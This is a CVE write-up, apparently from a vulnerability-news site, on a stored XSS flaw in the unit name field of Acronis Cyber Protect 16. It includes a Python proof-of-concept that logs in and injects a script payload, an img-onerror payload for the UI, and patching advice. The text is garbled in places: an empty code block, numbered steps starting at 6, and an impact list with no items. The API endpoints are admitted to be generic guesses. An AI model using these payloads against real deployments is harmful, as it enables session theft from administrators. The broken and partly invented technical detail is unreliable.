CVE CyberSecurity Database News

CVE-2023-48682 - Stored XSS in Acronis Cyber Protect 16 Unit Name Field (Exploit and Analysis)

Poster -

Cybersecurity isn't just about stopping ransomware or patching scary remote code bugs—sometimes, the smallest web loophole can open the door to big trouble. CVE-2023-48682 is a prime example: a stored cross-site scripting (XSS) vulnerability that affects Acronis Cyber Protect 16 (on both Linux and Windows) before build 37391.

This long read will break down what CVE-2023-48682 is, how it works, how you can exploit it, and (importantly) how to defend against it. If you're running Acronis Cyber Protect 16, you need to patch NOW.

[Where's the Bug? - Technical Details](#wheres-the-bug-technical-details)

3. [How to Exploit Stored XSS in Acronis Cyber Protect 16](#how-to-exploit-stored-xss-in-acronis-cyber-protect-16)

What Is CVE-2023-48682?

CVE-2023-48682 is a stored XSS vulnerability in Acronis Cyber Protect 16 before build 37391, affecting both Linux and Windows deployments.

Stored XSS (cross-site scripting) happens when malicious scripts injected by an attacker are saved (stored) on the target server (e.g., in a database), and then served to users as part of the normal application interface.

In this case, the bug is due to unit name fields not being properly sanitized. An attacker can inject JavaScript code into a unit name, and when an admin or user views it through the web interface, the script will execute in their browser—potentially stealing session cookies or taking actions as the victim.

A unit name field on the device management or protection inventory page can be set to custom input.

- This field’s input is stored directly in the backend database without proper sanitization or escaping.
- When a user with privileges views units on the admin or monitoring interface, the unsanitized value is rendered as HTML and scripts can execute.

Vulnerable Products:

Builds before 37391

If you’re running any affected build, you are vulnerable.

Attacker prerequisites

- Must have access to an account able to add/modify a unit name (standard user or rogue insider)

`html

Wait for the admin user (victim) to log in and view units.

6. Payload executes in the victim’s browser session, giving the attacker XSS privileges, including session theft or privilege escalation.

Demo: Proof-of-Concept (PoC)

Below is a sample Python snippet to automate the attack using requests. This is for learning purposes only.

import requests

# Set these values to match your target system and credentials
TARGET = "https://acronis.example.com";
LOGIN_URL = f"{TARGET}/login"
ADD_UNIT_URL = f"{TARGET}/api/units/add"
USERNAME = "attacker"
PASSWORD = "password123"

# Start a session to persist cookies
session = requests.Session()

# 1. Log in and obtain a session
login_response = session.post(LOGIN_URL, data={
    'username': USERNAME,
    'password': PASSWORD
})

if login_response.status_code != 200:
    print("Login failed.")
    exit()

# 2. Add a unit with XSS payload in the name
xss_payload = '<script>alert(document.domain)</script>'

add_unit_response = session.post(ADD_UNIT_URL, json={
    'unit_name': xss_payload,
    # ...other required fields...
})

if add_unit_response.status_code == 200:
    print("XSS payload injected successfully.")
else:
    print("Failed to inject payload.")

*Disclaimer*: The API endpoints and parameter names may differ based on the actual deployment. This is a generic example—adapt as needed.

Alternatively, simply enter the following as the *Unit Name* in the UI

<img src=x onerror=alert('XSS')>

Impact

Why does this matter? Acronis Cyber Protect manages backups, disaster recovery, and endpoint security—typically for sensitive business infrastructure. If an attacker can hijack an administrator's session with XSS, they could:

Update NOW:

- Download and install build 37391 or later from Acronis official downloads.

Input sanitization:

- Validate and encode user input server-side, especially for fields that accept user-controlled values such as names or labels.

References

- Acronis Update Release Notes
- OWASP XSS Cheat Sheet
- CVE Details: CVE-2023-48682


In summary:
Stored XSS vulnerabilities like CVE-2023-48682 are easy to overlook but can have huge impact, especially in high-trust software like backup/disaster recovery platforms. Patch immediately and audit your web applications for similar issues!

*Want more infosec rundowns like this? Follow me on GitHub for frequent updates!*

Timeline

Published on: 02/27/2024 17:15:11 UTC
Last modified on: 02/28/2024 14:07:00 UTC